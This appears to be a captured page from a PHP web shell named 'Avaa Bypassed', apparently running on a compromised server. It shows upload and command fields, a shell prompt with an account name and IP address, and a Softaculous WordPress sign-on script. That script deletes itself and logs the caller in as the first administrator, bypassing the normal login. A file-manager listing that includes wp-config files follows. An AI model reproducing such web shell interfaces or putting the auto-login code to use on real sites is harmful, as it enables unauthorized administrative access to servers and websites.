[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.118.1.100: ~ $
<?php
@unlink(__FILE__);

// Validate if the request is from Softaculous
if($_REQUEST['pass'] != '[[autopass]]'){
	die("Unauthorized Access");
}

// Dummy plugin dir so that no plugins are loaded as they conflict with our login process
define('WP_PLUGIN_DIR', '[[softpath]]/[[autopass]]');

require('wp-blog-header.php');
require('wp-includes/pluggable.php');

$signon_user = '[[signon_username]]';

//Backword compatibility ($__setting['signon_username'] won't be there in previous versions <= 5.2.3)
if(!empty($signon_user) && !preg_match('/^\[\[(.*?)\]\]$/is', $signon_user)){
	$user = get_user_by('login', $signon_user);
}else{
	$user_info = get_userdata(1);
	// Automatic login //
	$username = $user_info->user_login;
	$user = get_user_by('login', $username);
}

// Redirect URL //
if ( !is_wp_error( $user ) )
{
    wp_clear_auth_cookie();
    wp_set_current_user ( $user->ID );
    wp_set_auth_cookie  ( $user->ID );

    $redirect_to = admin_url();
    wp_safe_redirect( $redirect_to );

    exit();
}

Filemanager

Name Type Size Permission Actions
images Folder 0755
php53 Folder 0755
php56 Folder 0755
php71 Folder 0755
php81 Folder 0755
php82 Folder 0755
.htaccess File 482 B 0644
_htaccess File 333 B 0644
_index.php File 59 B 0644
_wp-config.php File 3.44 KB 0644
check_charset.php File 1.82 KB 0644
clone.php File 15.71 KB 0644
edit.php File 5.16 KB 0644
edit.xml File 628 B 0644
extend.php File 3.94 KB 0644
fileindex.php File 305 B 0644
import.php File 5.69 KB 0644
info.xml File 2.89 KB 0644
install.js File 924 B 0644
install.php File 19.67 KB 0644
install.xml File 1.23 KB 0644
md5 File 2.46 KB 0644
notes.txt File 1.76 KB 0644
sign_on.php File 1010 B 0644
soft.htaccess File 127 B 0644
wp-config.php File 3.15 KB 0644